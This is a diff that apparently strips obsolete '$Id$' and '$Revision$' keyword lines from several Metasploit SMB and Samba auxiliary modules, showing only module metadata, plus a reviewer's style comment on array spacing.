# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -29,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'SMB Scanner Check File/Directory Utility',
'Version' => '$Revision$',
'Description' => %Q{
This module is useful when checking an entire network
of SMB hosts for the presence of a known file or directory.

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'SMB Directory Listing Utility',
'Version' => '$Revision$',
'Description' => %Q{
This module lists the directory of a target share and path. The only reason
to use this module is if your existing SMB client is not able to support the features

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -28,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'Samba Symlink Directory Traversal',
'Version' => '$Revision$',
'Description' => %Q{
This module exploits a directory traversal flaw in the Samba
CIFS server. To exploit this flaw, a writeable share must be specified.

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -28,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'SMB File Upload Utility',
'Version' => '$Revision$',
'Description' => %Q{
This module uploads a file to a target share and path. The only reason
to use this module is if your existing SMB client is not able to support the features

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -35,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary
'jduck' # Ported to MSF v3
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2003-0027'],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['OSVDB', '30172'],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -32,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary
'theLightCosine'
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['BID', '17978'],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'hdm'],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['OSVDB', '66842'],
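Review bot: style nit on the context line `'Author' => [ 'hdm'],`, where the array has a space after the opening bracket but none before the closing one, unlike `[ 'Matteo Cantoni <goony[at]nothink.org>' ]` earlier in this diff. It is not worth mixing into a mechanical keyword cleanup, but a follow-up that normalises it to `[ 'hdm' ]` would keep the metadata hashes consistent.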

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'hdm'],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['OSVDB', '66842'],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'hdm'],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['OSVDB', '66842'],

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'hdm'],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['OSVDB', '66842'],

Some files were not shown because too many files have changed in this diff